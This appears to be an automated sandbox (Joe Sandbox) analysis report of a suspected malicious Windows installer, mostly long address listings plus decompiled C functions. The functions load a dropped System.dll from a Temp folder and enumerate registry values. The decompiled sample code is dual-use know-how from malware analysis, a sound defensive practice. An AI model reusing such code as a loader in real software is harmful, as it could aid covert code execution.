                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x004069bf
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407044
                                                          0x0040703e
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x0040703e
                                                          0x00406fc5
                                                          0x00406fc2

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                          • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                          • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                          • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2d8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406695( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052B0(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004038FA( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                          0x0040202c
                                                          0x0040202c
                                                          0x00402031
                                                          0x00402038
                                                          0x004020f7
                                                          0x00402245
                                                          0x00402245
                                                          0x00402abf
                                                          0x00402ac2
                                                          0x00402ace
                                                          0x00402ace
                                                          0x00402047
                                                          0x00402051
                                                          0x00402054
                                                          0x00402064
                                                          0x00402068
                                                          0x00402070
                                                          0x00402073
                                                          0x004020f0
                                                          0x00000000
                                                          0x004020f0
                                                          0x00402075
                                                          0x00402080
                                                          0x00402084
                                                          0x004020c4
                                                          0x00402086
                                                          0x00402089
                                                          0x0040208c
                                                          0x004020b8
                                                          0x0040208e
                                                          0x00402091
                                                          0x0040209a
                                                          0x0040209c
                                                          0x0040209c
                                                          0x0040209a
                                                          0x0040208c
                                                          0x004020cc
                                                          0x004020e5
                                                          0x004020e5
                                                          0x00000000
                                                          0x004020cc
                                                          0x00402057
                                                          0x0040205f
                                                          0x00402062
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                            • Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00403233), ref: 0040530B
                                                            • Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll), ref: 0040531D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                          • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
                                                          • Opcode Fuzzy Hash: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                          • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                          0x004024f2
                                                          0x004024f2
                                                          0x004024f2
                                                          0x004024f7
                                                          0x004024fe
                                                          0x00402500
                                                          0x00402508
                                                          0x0040250b
                                                          0x0040250e
                                                          0x00402885
                                                          0x00402514
                                                          0x0040251c
                                                          0x0040251f
                                                          0x00402538
                                                          0x0040253e
                                                          0x00402540
                                                          0x00402542
